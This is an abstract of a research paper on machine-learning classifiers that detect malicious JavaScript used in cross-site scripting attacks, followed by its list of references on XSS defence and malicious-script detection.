Detecting Cross-Site Scripting Attacks Using Machine Learning

Cross-site scripting (XSS) is one of the most frequently occurring types of attacks on web applications, hence is of importance in information security. XSS is where the attacker injects malicious code, typically JavaScript, into the web application in order to be executed in the user’s browser. Identifying that a script is malicious is an important part of the defence of a web application. This paper investigates using SVM, k-NN and Random Forests to detect and limit these attacks, whether known or unknown, by building classifiers for JavaScript code. It demonstrated that using an interesting feature set combining language syntax and behavioural features results in classifiers that give high accuracy and precision on large real world data sets without restricting attention only to obfuscation.

[1]  Eunjin Jung,et al.  Obfuscated malicious javascript detection using classification techniques , 2009, 2009 4th International Conference on Malicious and Unwanted Software (MALWARE).

[2]  Christopher Krügel,et al.  Client-side cross-site scripting protection , 2009, Comput. Secur..

[3]  Zhendong Su,et al.  The essence of command injection attacks in web applications , 2006, POPL '06.

[4]  Hao Chen,et al.  Noncespaces: Using randomization to defeat cross-site scripting attacks , 2012, Comput. Secur..

[5]  Giovanni Vigna,et al.  Multi-module vulnerability analysis of web-based applications , 2007, CCS '07.

[6]  Wei-Hong Wang,et al.  A Static Malicious Javascript Detection Using SVM , 2013 .

[7]  Tadeusz Pietraszek,et al.  Defending Against Injection Attacks Through Context-Sensitive String Evaluation , 2005, RAID.

[8]  Christopher Krügel,et al.  Cross Site Scripting Prevention with Dynamic Data Tainting and Static Analysis , 2007, NDSS.

[9]  Eduardo Souto,et al.  ETSSDetector: A Tool to Automatically Detect Cross-Site Scripting Vulnerabilities , 2014, 2014 IEEE 13th International Symposium on Network Computing and Applications.

[10]  Incheon Paik,et al.  Classification of malicious web code by machine learning , 2011, 2011 3rd International Conference on Awareness Science and Technology (iCAST).

[11]  Krzysztof Kryszczuk,et al.  Detecting obfuscated JavaScripts using machine learning , 2016 .

[12]  Dawn Xiaodong Song,et al.  A Systematic Analysis of XSS Sanitization in Web Application Frameworks , 2011, ESORICS.

[13]  Dawn Xiaodong Song,et al.  Document Structure Integrity: A Robust Basis for Cross-site Scripting Defense , 2009, NDSS.

[14]  Eduardo Feitosa,et al.  Automatic classification of cross-site scripting in web pages using document-based and URL-based features , 2012, 2012 IEEE Symposium on Computers and Communications (ISCC).

[15]  Christopher Krügel,et al.  Noxes: a client-side solution for mitigating cross-site scripting attacks , 2006, SAC '06.

[16]  Atul Gupta,et al.  On Security Issues in Web Applications through Cross Site Scripting (XSS) , 2013, 2013 20th Asia-Pacific Software Engineering Conference (APSEC).

[17]  Pedro M. Domingos A few useful things to know about machine learning , 2012, Commun. ACM.

[18]  Wei Xu,et al.  JStill: mostly static detection of obfuscated malicious JavaScript code , 2013, CODASPY.